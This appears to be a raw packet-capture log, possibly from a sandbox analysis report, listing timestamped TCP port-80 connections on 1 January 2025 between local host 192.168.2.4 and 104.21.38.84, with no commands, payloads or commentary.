                                                                                                                          Jan 1, 2025 04:23:28.965154886 CET8050059104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:28.965214968 CET5005980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:28.965281963 CET5005980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:28.965549946 CET8050055104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:28.965595007 CET5005580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:28.970038891 CET8050059104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:29.125633955 CET5006280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:29.130530119 CET8050062104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:29.130599976 CET5006280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:29.130665064 CET5006280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:29.135489941 CET8050062104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:29.321029902 CET5005980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:29.325930119 CET8050059104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:29.326008081 CET8050059104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:29.409382105 CET8050059104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:29.459187984 CET5005980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:29.474906921 CET5006280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:29.479762077 CET8050062104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:29.574389935 CET8050062104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:29.615433931 CET5006280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:29.723485947 CET8050059104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:29.771742105 CET5005980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:29.921484947 CET8050062104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:29.959769964 CET8050062104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:29.963519096 CET5006280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:30.047226906 CET5005980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:30.047241926 CET5006280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:30.047873020 CET5006880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:30.052274942 CET8050059104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:30.052589893 CET5005980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:30.052690029 CET8050068104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:30.052699089 CET8050062104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:30.052752972 CET5006280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:30.052767038 CET5006880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:30.052881956 CET5006880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:30.057691097 CET8050068104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:30.396790981 CET5006880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:30.403644085 CET8050068104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:30.504983902 CET8050068104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:30.552942991 CET5006880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:30.680083990 CET8050068104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:30.724931002 CET5006880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:30.798365116 CET5007480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:30.803175926 CET8050074104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:30.803638935 CET5007480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:30.803767920 CET5007480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:30.808547974 CET8050074104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:31.162478924 CET5007480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:31.167327881 CET8050074104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:31.277174950 CET8050074104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:31.318567991 CET5007480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:31.547723055 CET8050074104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:31.599817991 CET5007480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:31.673492908 CET5007480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:31.674026012 CET5007980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:31.678482056 CET8050074104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:31.678822041 CET8050079104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:31.678829908 CET5007480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:31.678874016 CET5007980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:31.679172993 CET5007980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:31.683957100 CET8050079104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:32.037556887 CET5007980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:32.042320967 CET8050079104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:32.131272078 CET8050079104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:32.177941084 CET5007980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:32.308424950 CET8050079104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:32.349848032 CET5007980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:32.422571898 CET5007980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:32.423163891 CET5008580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:32.428069115 CET8050079104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:32.428163052 CET5007980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:32.428591013 CET8050085104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:32.428649902 CET5008580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:32.428725958 CET5008580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:32.433814049 CET8050085104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:32.787457943 CET5008580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:32.792366028 CET8050085104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:32.877871990 CET8050085104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:32.927958965 CET5008580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:33.150619030 CET8050085104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:33.193734884 CET5008580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:33.265090942 CET5006880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:33.267630100 CET5008580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:33.268263102 CET5009180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:33.272593021 CET8050085104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:33.273094893 CET8050091104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:33.273164034 CET5008580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:33.273194075 CET5009180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:33.275537014 CET5009180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:33.280312061 CET8050091104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:33.631248951 CET5009180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:33.636159897 CET8050091104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:33.742856979 CET8050091104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:33.787359953 CET5009180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:34.021209002 CET8050091104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:34.068639040 CET5009180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:34.141084909 CET5009180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:34.141592979 CET5009880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:34.146054029 CET8050091104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:34.146449089 CET8050098104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:34.146509886 CET5009180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:34.146539927 CET5009880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:34.146653891 CET5009880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:34.151432991 CET8050098104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:34.490541935 CET5009880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:34.677716017 CET8050098104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:34.677742004 CET8050098104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:34.724831104 CET5009880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:34.725800991 CET5009880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:34.726327896 CET5010380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:34.730803967 CET8050098104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:34.730864048 CET5009880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:34.731189013 CET8050103104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:34.731245041 CET5010380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:34.731349945 CET5010380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:34.736134052 CET8050103104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:34.846477985 CET5010480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:34.852978945 CET8050104104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:34.853054047 CET5010480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:34.853179932 CET5010480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:34.858072996 CET8050104104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:35.084315062 CET5010380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:35.089194059 CET8050103104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:35.089324951 CET8050103104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:35.203098059 CET8050103104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:35.209280014 CET5010480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:35.214128017 CET8050104104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:35.256072998 CET5010380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:35.320928097 CET8050104104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:35.365452051 CET5010480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:35.381494999 CET8050103104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:35.427942991 CET5010380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:35.594366074 CET8050104104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:35.646694899 CET5010480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:35.737443924 CET5010380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:35.737526894 CET5010480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:35.739013910 CET5011180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:35.742477894 CET8050103104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:35.742695093 CET5010380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:35.742775917 CET8050104104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:35.742825985 CET5010480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:35.743777037 CET8050111104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:35.743832111 CET5011180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:35.744132996 CET5011180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:35.748902082 CET8050111104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:36.100008965 CET5011180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:36.104957104 CET8050111104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:36.207395077 CET8050111104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:36.259500027 CET5011180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:36.392963886 CET8050111104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:36.443583012 CET5011180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:36.516308069 CET5011680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:36.516308069 CET5011180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:36.521116018 CET8050116104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:36.521271944 CET8050111104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:36.521378040 CET5011180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:36.521378994 CET5011680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:36.521663904 CET5011680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:36.526509047 CET8050116104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:36.881247997 CET5011680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:36.887728930 CET8050116104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:36.974251986 CET8050116104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:37.023500919 CET5011680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:37.249808073 CET8050116104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:37.302953959 CET5011680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:37.421096087 CET5012580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:37.426031113 CET8050125104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:37.426093102 CET5012580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:37.426214933 CET5012580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:37.431030989 CET8050125104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:37.772000074 CET5012580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:37.776890993 CET8050125104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:37.879137039 CET8050125104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:37.928037882 CET5012580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:38.140454054 CET8050125104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:38.193594933 CET5012580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:38.267452002 CET5012580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:38.267452955 CET5013280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:38.272304058 CET8050132104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:38.272454977 CET8050125104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:38.272577047 CET5012580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:38.272577047 CET5013280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:38.273736954 CET5013280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:38.278587103 CET8050132104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:38.631524086 CET5013280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:38.636373043 CET8050132104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:38.769309998 CET8050132104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:38.818594933 CET5013280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:38.938507080 CET8050132104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:38.991507053 CET5013280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:39.063373089 CET5011680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:39.065263033 CET5013280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:39.070291042 CET8050132104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:39.070331097 CET5013480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:39.070388079 CET5013280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:39.075189114 CET8050134104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:39.075284004 CET5013480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:39.075460911 CET5013480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:39.080259085 CET8050134104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:39.428483009 CET5013480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:39.433460951 CET8050134104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:39.519325018 CET8050134104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:39.564325094 CET5013480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:39.702217102 CET8050134104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:39.756088972 CET5013480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:39.822748899 CET5013480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:39.823519945 CET5013580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:39.827723026 CET8050134104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:39.827780008 CET5013480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:39.828356981 CET8050135104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:39.828412056 CET5013580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:39.828537941 CET5013580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:39.833419085 CET8050135104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:40.178105116 CET5013580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:40.183065891 CET8050135104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:40.275326967 CET8050135104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:40.321696043 CET5013580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:40.397967100 CET5013580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:40.398391962 CET5013680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:40.403109074 CET8050135104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:40.403179884 CET8050136104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:40.403297901 CET5013680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:40.403297901 CET5013580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:40.403426886 CET5013680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:40.408263922 CET8050136104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:40.517602921 CET5013780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:40.522460938 CET8050137104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:40.525628090 CET5013780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:40.529701948 CET5013780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:40.534529924 CET8050137104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:40.757762909 CET5013680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:40.764525890 CET8050136104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:40.764538050 CET8050136104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:40.847615957 CET8050136104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:40.881584883 CET5013780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:40.886456013 CET8050137104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:40.897787094 CET5013680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:40.973340988 CET8050137104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:41.025815010 CET5013780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:41.103960991 CET8050136104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:41.146739960 CET5013680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:41.230324984 CET8050137104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:41.271708012 CET5013780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:41.354537010 CET5013680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:41.354754925 CET5013780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:41.355300903 CET5013880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:41.359620094 CET8050136104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:41.359663010 CET5013680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:41.359958887 CET8050137104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:41.359997034 CET5013780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:41.360115051 CET8050138104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:41.360161066 CET5013880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:41.360270977 CET5013880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:41.365030050 CET8050138104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:41.709315062 CET5013880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:41.714292049 CET8050138104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:41.833806992 CET8050138104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:41.881091118 CET5013880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:42.014357090 CET8050138104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:42.014591932 CET5013880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:42.020466089 CET8050138104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:42.020525932 CET5013880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:42.128453970 CET5013980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:42.133292913 CET8050139104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:42.133352041 CET5013980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:42.133455038 CET5013980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:42.138233900 CET8050139104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:42.491514921 CET5013980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:42.496429920 CET8050139104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:42.579343081 CET8050139104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:42.631504059 CET5013980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:42.843203068 CET8050139104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:42.896723986 CET5013980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:42.971206903 CET5013980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:42.975509882 CET5014080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:42.976294041 CET8050139104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:42.979593039 CET5013980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:42.980328083 CET8050140104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:42.980820894 CET5014080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:42.980890036 CET5014080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:42.985616922 CET8050140104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:43.334719896 CET5014080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:43.339684963 CET8050140104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:43.424834013 CET8050140104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:43.474836111 CET5014080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:43.610357046 CET8050140104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:43.662337065 CET5014080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:43.741813898 CET5014080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:43.742311954 CET5014180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:43.746840954 CET8050140104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:43.746886969 CET5014080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:43.747204065 CET8050141104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:43.747257948 CET5014180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:43.747339010 CET5014180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:43.752167940 CET8050141104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:44.100087881 CET5014180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:44.108035088 CET8050141104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:44.201528072 CET8050141104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:44.259507895 CET5014180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:44.458863020 CET8050141104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:44.506083965 CET5014180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:44.580749035 CET5014280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:44.580769062 CET5014180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:44.585635900 CET8050142104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:44.585766077 CET5014280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:44.585899115 CET8050141104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:44.585930109 CET5014280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:44.586051941 CET5014180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:44.590648890 CET8050142104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:44.943722963 CET5014280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:23:44.948609114 CET8050142104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:23:45.057805061 CET8050142104.21.38.84192.168.2.4
